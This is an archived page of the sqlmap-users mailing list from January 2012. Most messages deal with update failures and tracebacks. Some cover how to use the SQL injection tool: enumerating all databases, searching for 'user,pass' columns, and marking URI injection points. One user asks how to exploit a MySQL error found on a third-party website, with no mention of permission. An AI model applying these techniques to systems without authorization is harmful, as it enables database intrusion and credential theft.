Hi Abhishek. Safest thing would be to checkout the whole project from the beginning: svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev Kind regards, Miroslav Stampar On Thu, Jan 5, 2012 at 4:11 PM, Abhishek Mohanty <leo...@gm...>wrote: > root@bt:/pentest/database/sqlmap# ./sqlmap.py --update > > sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover > tool > http://sqlmap.sourceforge.net > > [!] Legal Disclaimer: usage of sqlmap for attacking web servers without > prior mutual consent can be considered as an illegal activity. it is the > final user's responsibility to obey all applicable local, state and federal > laws. authors assume no liability and are not responsible for any misuse or > damage caused by this program. > > [*] starting at: 20:30:27 > > [20:30:28] [INFO] updating sqlmap to latest development version from the > subversion repository > D /pentest/database/sqlmap/txt/oracle-default-passwords.txt > A /pentest/database/sqlmap/txt/smalldict.txt > A /pentest/database/sqlmap/plugins/dbms/db2 > A /pentest/database/sqlmap/plugins/dbms/db2/connector.py > A /pentest/database/sqlmap/plugins/dbms/db2/__init__.py > A /pentest/database/sqlmap/plugins/dbms/db2/takeover.py > A /pentest/database/sqlmap/plugins/dbms/db2/filesystem.py > A /pentest/database/sqlmap/plugins/dbms/db2/enumeration.py > A /pentest/database/sqlmap/plugins/dbms/db2/syntax.py > A /pentest/database/sqlmap/plugins/dbms/db2/fingerprint.py > A /pentest/database/sqlmap/_sqlmap.py > D /pentest/database/sqlmap/extra/xmlobject > A /pentest/database/sqlmap/extra/beautifulsoup > A /pentest/database/sqlmap/extra/beautifulsoup/__init__.py > A /pentest/database/sqlmap/extra/beautifulsoup/beautifulsoup.py > A /pentest/database/sqlmap/doc/FAQ.pdf > A /pentest/database/sqlmap/doc/FAQ.html > A /pentest/database/sqlmap/lib/utils/hashdb.py > > [20:34:04] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry > your run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the > bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4009) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py --update > Technique: None > Back-end DBMS: None (identified) > Traceback (most recent call last): > File "./sqlmap.py", line 78, in main > File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init > update() > File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update > client.update(rootDir) > ClientError: callback_get_login required > > [*] shutting down at: 20:34:04 > > root@bt:/pentest/database/sqlmap# ./sqlmap.py --update > Traceback (most recent call last): > File "./sqlmap.py", line 17, in <module> > from _sqlmap import main > File "/pentest/database/sqlmap/_sqlmap.py", line 27, in <module> > from lib.controller.controller import start > File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, > in <module> > from lib.controller.action import action > File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in > <module> > from lib.controller.handler import setHandler > File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in > <module> > from plugins.dbms.mssqlserver import MSSQLServerMap > File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", > line 14, in <module> > from plugins.dbms.mssqlserver.enumeration import Enumeration > File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", > line 28, in <module> > from plugins.generic.enumeration import Enumeration as > GenericEnumeration > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16, > in <module> > from lib.core.common import BigArray > ImportError: cannot import name BigArray > root@bt:/pentest/database/sqlmap# > > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Matt S. <ma...@su...> - 2012-01-05 22:59:28
|
Hi, During December it appears that something has changed (from my perspective at least) with SQLmap. Before it was possible to issue a --dbs --tables --columns during a pentest and SQLMAP would list all databases, columns and tables. However since upgrading to the new revision it appears that it is not possible to dump columns or perform searches outside of the current database.. Typically for the search i use to specify --search -C user,pass and SQLMap would happily go off and search all databases now the same command only searches the current database. [22:35:20] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) columns [22:35:20] [INFO] fetching current database Thanks, M |
|
From: Brandon P. <bpe...@gm...> - 2012-01-05 21:50:58
|
You can just run svn up from the root of the project. On Thu, Jan 5, 2012 at 9:11 AM, Abhishek Mohanty <leo...@gm...> wrote: > root@bt:/pentest/database/sqlmap# ./sqlmap.py --update > > sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover > tool > http://sqlmap.sourceforge.net > > [!] Legal Disclaimer: usage of sqlmap for attacking web servers without > prior mutual consent can be considered as an illegal activity. it is the > final user's responsibility to obey all applicable local, state and federal > laws. authors assume no liability and are not responsible for any misuse or > damage caused by this program. > > [*] starting at: 20:30:27 > > [20:30:28] [INFO] updating sqlmap to latest development version from the > subversion repository > D /pentest/database/sqlmap/txt/oracle-default-passwords.txt > A /pentest/database/sqlmap/txt/smalldict.txt > A /pentest/database/sqlmap/plugins/dbms/db2 > A /pentest/database/sqlmap/plugins/dbms/db2/connector.py > A /pentest/database/sqlmap/plugins/dbms/db2/__init__.py > A /pentest/database/sqlmap/plugins/dbms/db2/takeover.py > A /pentest/database/sqlmap/plugins/dbms/db2/filesystem.py > A /pentest/database/sqlmap/plugins/dbms/db2/enumeration.py > A /pentest/database/sqlmap/plugins/dbms/db2/syntax.py > A /pentest/database/sqlmap/plugins/dbms/db2/fingerprint.py > A /pentest/database/sqlmap/_sqlmap.py > D /pentest/database/sqlmap/extra/xmlobject > A /pentest/database/sqlmap/extra/beautifulsoup > A /pentest/database/sqlmap/extra/beautifulsoup/__init__.py > A /pentest/database/sqlmap/extra/beautifulsoup/beautifulsoup.py > A /pentest/database/sqlmap/doc/FAQ.pdf > A /pentest/database/sqlmap/doc/FAQ.html > A /pentest/database/sqlmap/lib/utils/hashdb.py > > [20:34:04] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4009) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py --update > Technique: None > Back-end DBMS: None (identified) > Traceback (most recent call last): > File "./sqlmap.py", line 78, in main > File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init > update() > File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update > client.update(rootDir) > ClientError: callback_get_login required > > [*] shutting down at: 20:34:04 > > root@bt:/pentest/database/sqlmap# ./sqlmap.py --update > Traceback (most recent call last): > File "./sqlmap.py", line 17, in <module> > from _sqlmap import main > File "/pentest/database/sqlmap/_sqlmap.py", line 27, in <module> > from lib.controller.controller import start > File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in > <module> > from lib.controller.action import action > File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in > <module> > from lib.controller.handler import setHandler > File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in > <module> > from plugins.dbms.mssqlserver import MSSQLServerMap > File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line > 14, in <module> > from plugins.dbms.mssqlserver.enumeration import Enumeration > File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", > line 28, in <module> > from plugins.generic.enumeration import Enumeration as > GenericEnumeration > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16, > in <module> > from lib.core.common import BigArray > ImportError: cannot import name BigArray > root@bt:/pentest/database/sqlmap# > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-05 18:05:35
|
It does not count as a bug. That's the expected behaviour. Bernardo Damele A. G. This message was sent from a smartphone On 5 Jan 2012, at 14:46, Chris Oakley <chr...@gm...> wrote: -p will definitely work, no need for * when it's not rewritten URLs. Not sure if that counts as a bug therefore... so in the meantime, just use -p Chris On 5 January 2012 13:53, Gianluca Brindisi <g...@br...> wrote: > Hello, > if I provide an URL with * like this: > > http://target.com/path/to/index.php?id=12*&action=add&path=/path/to/&imgIndex= > > sqlmap don't recognize valid get param in the urls: > > [15:34:23] [WARNING] you've provided target url without any GET parameters > (e.g. www.site.com/article.php?id=1) and without providing any POST > parameters through --data option > do you want to try URI injections in the target url itself? [Y/n/q] > > But looks like it inject correctly where I placed the wildcard. > > Instead without * everything is working fine as usual. > So I am not sure if it's this some sort of bug or it's me misusing the * > option (i.e. if the url is not rewrote I should just use -p id). > > Thanks, > Gianluca Brindisi > > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > ------------------------------------------------------------------------------ Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex infrastructure or vast IT resources to deliver seamless, secure access to virtual desktops. With this all-in-one solution, easily deploy virtual desktops for less than the cost of PCs and save 60% on VDI infrastructure costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Borja B. <bor...@gm...> - 2012-01-05 15:52:22
|
Hi ! Is my first mail to this list, as I'm an active user of the software I had to start mailing here someday so... here is my question: I've found a MySQL error on a website (by a modification in the URL) that throws me this: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/virtual/thewebsite.com/web/news/index.php on line 11 The syntax of the url is '' http://www.thewebsite.com/news/today/*/'' and in the normal state of the URL there is a number (of the news page shown) where I have writen the *. If I write anything that is not a number it returns me the error. Im having to problems here: First one is that I'm not sure if im doing right the URI inyection with sqlmap because i've found 3 URI inyections in diferent places but without success. (Im using the * to show the tool where to test) And the other one is that I'm not really sure if that error shows a really exploitable flaw. Sqlmap, by using the * wildcard, throws some possible UNION exploitable points, but are discarded when finished the tests. I have tried also with --union-char switch with different characters. Sorry for all this text, hope you could help me a bit :S Thanks ! |
|
From: Abhishek M. <leo...@gm...> - 2012-01-05 15:12:00
|
root@bt:/pentest/database/sqlmap# ./sqlmap.py --update
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover
tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without
prior mutual consent can be considered as an illegal activity. it is the
final user's responsibility to obey all applicable local, state and federal
laws. authors assume no liability and are not responsible for any misuse or
damage caused by this program.
[*] starting at: 20:30:27
[20:30:28] [INFO] updating sqlmap to latest development version from the
subversion repository
D /pentest/database/sqlmap/txt/oracle-default-passwords.txt
A /pentest/database/sqlmap/txt/smalldict.txt
A /pentest/database/sqlmap/plugins/dbms/db2
A /pentest/database/sqlmap/plugins/dbms/db2/connector.py
A /pentest/database/sqlmap/plugins/dbms/db2/__init__.py
A /pentest/database/sqlmap/plugins/dbms/db2/takeover.py
A /pentest/database/sqlmap/plugins/dbms/db2/filesystem.py
A /pentest/database/sqlmap/plugins/dbms/db2/enumeration.py
A /pentest/database/sqlmap/plugins/dbms/db2/syntax.py
A /pentest/database/sqlmap/plugins/dbms/db2/fingerprint.py
A /pentest/database/sqlmap/_sqlmap.py
D /pentest/database/sqlmap/extra/xmlobject
A /pentest/database/sqlmap/extra/beautifulsoup
A /pentest/database/sqlmap/extra/beautifulsoup/__init__.py
A /pentest/database/sqlmap/extra/beautifulsoup/beautifulsoup.py
A /pentest/database/sqlmap/doc/FAQ.pdf
A /pentest/database/sqlmap/doc/FAQ.html
A /pentest/database/sqlmap/lib/utils/hashdb.py
[20:34:04] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry
your run with the latest development version from the Subversion
repository. If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the
bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4009)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py --update
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
File "./sqlmap.py", line 78, in main
File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init
update()
File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update
client.update(rootDir)
ClientError: callback_get_login required
[*] shutting down at: 20:34:04
root@bt:/pentest/database/sqlmap# ./sqlmap.py --update
Traceback (most recent call last):
File "./sqlmap.py", line 17, in <module>
from _sqlmap import main
File "/pentest/database/sqlmap/_sqlmap.py", line 27, in <module>
from lib.controller.controller import start
File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in
<module>
from lib.controller.action import action
File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in
<module>
from lib.controller.handler import setHandler
File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in
<module>
from plugins.dbms.mssqlserver import MSSQLServerMap
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py",
line 14, in <module>
from plugins.dbms.mssqlserver.enumeration import Enumeration
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py",
line 28, in <module>
from plugins.generic.enumeration import Enumeration as
GenericEnumeration
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16,
in <module>
from lib.core.common import BigArray
ImportError: cannot import name BigArray
root@bt:/pentest/database/sqlmap#
|
|
From: Chris O. <chr...@gm...> - 2012-01-05 14:46:32
|
-p will definitely work, no need for * when it's not rewritten URLs. Not sure if that counts as a bug therefore... so in the meantime, just use -p Chris On 5 January 2012 13:53, Gianluca Brindisi <g...@br...> wrote: > Hello, > if I provide an URL with * like this: > > http://target.com/path/to/index.php?id=12*&action=add&path=/path/to/&imgIndex= > > sqlmap don't recognize valid get param in the urls: > > [15:34:23] [WARNING] you've provided target url without any GET parameters > (e.g. www.site.com/article.php?id=1) and without providing any POST > parameters through --data option > do you want to try URI injections in the target url itself? [Y/n/q] > > But looks like it inject correctly where I placed the wildcard. > > Instead without * everything is working fine as usual. > So I am not sure if it's this some sort of bug or it's me misusing the * > option (i.e. if the url is not rewrote I should just use -p id). > > Thanks, > Gianluca Brindisi > > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
48 messages has been excluded from this view by a project administrator.
